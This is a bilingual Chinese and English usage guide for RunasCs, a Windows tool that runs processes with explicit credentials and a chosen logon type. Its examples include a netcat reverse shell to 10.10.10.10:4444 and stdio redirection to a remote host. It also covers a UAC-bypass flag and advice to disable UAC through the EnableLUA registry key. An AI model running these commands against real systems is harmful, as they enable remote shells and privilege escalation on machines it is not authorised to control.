RunasCs 是一个实用程序,用于使用显式凭据以不同于用户当前登录所提供的权限来运行特定进程。 该工具是 Windows 内置 runas.exe 的改进开源版本,解决了以下一些限制:
CreateProcessAsUser() 和 CreateProcessWithTokenW()(自动检测)RunasCs 具有自动检测功能,可为每个上下文确定最佳的创建进程函数。 根据进程调用方的令牌权限,它将按以下优先顺序使用其中一个创建进程函数:
CreateProcessAsUserW()CreateProcessWithTokenW()CreateProcessWithLogonW().NET Framework >= 2.0
RunasCs v1.5 - @splinter_code
Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]
Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.
Positional arguments:
username username of the user
password password of the user
cmd commandline for the process
Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
RunasCs determines an appropriate CreateProcess
function automatically according to your privileges.
0 - CreateProcessAsUserW
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.
Examples:
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation
这两个进程(调用方和被调用方)将通过一个 管道(同时用于 stdout 和 stderr)进行通信。 默认登录类型为 2(交互式)。
默认情况下,交互式(2)登录类型受 UAC 限制,并且这些身份验证生成的令牌会被过滤。 你可以通过将以下注册表项设置为 0 并重新启动服务器,来使交互式登录不受任何限制:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
否则,你可以尝试使用 --bypass-uac 标志来尝试绕过令牌过滤限制。
NetworkCleartext (8) 登录类型拥有最广泛的权限,因为它不会被 UAC 过滤本地令牌,并且仍然允许 通过网络进行身份验证,因为它将凭据存储在身份验证包中。如果你拥有足够的权限,请尝试始终通过 --logon-type 8 标志指定此登录类型。
默认情况下,调用进程(RunasCs)将等待所生成进程执行结束。
如果你需要生成后台或异步进程,例如生成反向 shell,则需要将参数 -t timeout 设置为 0。在这种情况下,RunasCs 不会等待新生成的进程执行结束。